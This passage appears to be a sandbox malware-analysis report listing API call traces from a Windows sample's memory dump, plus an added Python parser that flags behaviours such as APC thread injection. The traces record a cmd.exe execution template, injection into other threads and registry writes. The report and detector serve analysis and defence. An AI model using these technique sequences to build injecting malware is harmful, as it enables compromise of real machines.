    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
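The entry above is worth reading as a sequence rather than as an unordered API ID: the subcall at 001CB35F snapshots threads (CreateToolhelp32Snapshot, Thread32First/Thread32Next), opens each one with 0x1F03FF (THREAD_ALL_ACCESS as defined in pre-Vista SDKs) and queues an APC into it, which is the classic APC-injection loop. Reading dozens of such entries by hand is error-prone, so here is an added example (not Joe Sandbox code and not part of the original report) of a small Python parser for the "APIs" bullet lists in these Similarity entries. It reconstructs each function's direct calls and listed subcalls, decodes the access mask and creation disposition of CreateFileA/W calls, and flags a few API combinations. The line layout is taken from the listing on this page; the behaviour labels, the access-mask tables and the SAMPLE text (lines copied from two entries above) are this example's own assumptions.

```python
"""Parse the 'APIs' bullet lists of Joe Sandbox Similarity entries into call
sequences, decode CreateFile* arguments and flag a few behaviours of interest.
Added example for this page, not Joe Sandbox code: the line layout is taken from
the listing above; the behaviour labels, the access tables and SAMPLE (lines
copied from two entries above) are this example's own assumptions."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# One call line, with or without an argument list or a "Part of subcall" prefix.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<api>\w+)\."
    r"(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "• API ID: ..."
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# subcall_of is the callee address when the line was listed as "Part of subcall".
Call = namedtuple("Call", "api module args ref subcall_of")


@dataclass
class Entry:
    fields: dict = field(default_factory=dict)
    calls: list = field(default_factory=list)

    def api_names(self, include_subcalls=True):
        return {c.api for c in self.calls if include_subcalls or c.subcall_of is None}


def parse_entries(text):
    """Split the text at each 'Similarity' heading; collect its fields and calls."""
    entries, cur, in_apis = [], None, False
    for line in text.splitlines():
        s = line.strip()
        if s == "Similarity":
            cur, in_apis = Entry(), False
            entries.append(cur)
        elif cur is None:
            continue
        elif s in ("APIs", "Strings", "Memory Dump Source"):
            in_apis = s == "APIs"
        elif in_apis and (m := CALL_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
        elif m := FIELD_RE.match(line):
            cur.fields[m["key"].strip()] = m["val"].strip()
    return entries


def decode_createfile(call):
    """Name dwDesiredAccess (arg 2) and dwCreationDisposition (arg 5) of a
    CreateFileA/W call; '?' means the sandbox could not recover the value."""
    if not call.api.startswith("CreateFile") or len(call.args) < 5:
        return None
    try:
        access, disp = int(call.args[1], 16), int(call.args[4], 16)
    except ValueError:
        return None
    names = [n for bit, n in GENERIC.items() if access & bit]
    return {"access": "|".join(names) or f"0x{access:08X}",
            "disposition": DISPOSITION.get(disp, f"0x{disp:X}")}


def flag_behaviours(entry):
    """Assumed heuristics: API combinations (subcalls included) worth a closer look."""
    apis, flags = entry.api_names(), set()
    if {"Thread32First", "OpenThread", "QueueUserAPC"} <= apis:
        flags.add("apc_thread_injection")
    opens_file = any(a.startswith("CreateFile") for a in apis)
    if opens_file and "WriteFile" in apis:
        flags.add("file_write")
    if opens_file and "ReadFile" in apis:
        flags.add("file_read")
    return flags


# Constructed input: lines copied from two entries of the listing above.
SAMPLE = """\
Similarity
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
APIs
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.fields.get("API ID"), sorted(flag_behaviours(e)),
              [decode_createfile(c) for c in e.calls if c.api.startswith("CreateFile")])
```

Two caveats when using this on a full report: a `?` argument is a value the sandbox could not recover, so a missing flag is not evidence of a missing behaviour, and subcalls are listed by the report only one level deep, so a behaviour split across deeper callees will not be joined by these heuristics.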
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
